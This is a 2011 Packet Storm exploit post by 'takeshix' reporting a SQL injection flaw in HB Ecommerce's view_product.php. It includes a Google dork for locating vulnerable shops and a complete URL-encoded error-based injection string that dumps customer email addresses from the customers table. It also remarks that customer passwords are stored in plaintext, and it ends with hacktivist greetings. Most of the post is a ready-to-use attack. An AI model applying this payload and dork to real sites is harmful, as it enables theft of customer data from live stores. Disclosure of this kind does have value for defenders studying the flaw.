HB Ecommerce SQL Injection

2011-05-27T00:00:00
ID PACKETSTORM:101739
Type packetstorm
Reporter takeshix
Modified 2011-05-27T00:00:00

Description

                                        
                                            `-------------[ HB ECOMMERCE SQL Injection Vulnerability ]---------------  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
[+] Exploit Title: [ HB ECOMMERCE SQL Injection Vulnerability ]  
[+] Google Dork: intext:'supplied by hb ecommerce'  
[+] Date: 26.05.2011  
[+] Author: takeshix  
[+] Author Contact: takeshix@safe-mail.net  
[+] Software Link: http://www.hbecommerce.co.uk/  
[+] Tested on: Debian GNU/Linux Testing(Wheezy) x64  
[+] System: PHP  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
vulnerable url:  
  
/templates1/view_product.php?product=3D  
  
Example:  
  
http://localhost/templates1/view_product.php?product=3D[SQL INJECTION]  
  
Get an Mail from the Customers Table:  
  
http://localhost/templates1/view_product.php?product=3D94746%20AND%20%28SEL=  
ECT%20716%20FROM%28SELECT%20COUNT%28%2A%29%2CCONCAT%28CHAR%2858%2C122%2C99%=  
2C109%2C58%29%2C%28SELECT%20MID%28%28IFNULL%28CAST%28email%20AS%20CHAR%29%2=  
CCHAR%2832%29%29%29%2C1%2C50%29%20FROM%20%60web34-hbecommerc%60.customers%2=  
0LIMIT%205%2C1%29%2CCHAR%2858%2C109%2C103%2C100%2C58%29%2CFLOOR%28RAND%280%=  
29%2A2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%2=  
9a%29%20  
  
note: customer passwords dumped in plaintext!  
  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
Greez to: esc0bar | Someone | takedown  
------------------------------------------------------------------------  
------------------------------------------------------------------------  
--------------------------[ hacktivistas ]------------------------------  
  
`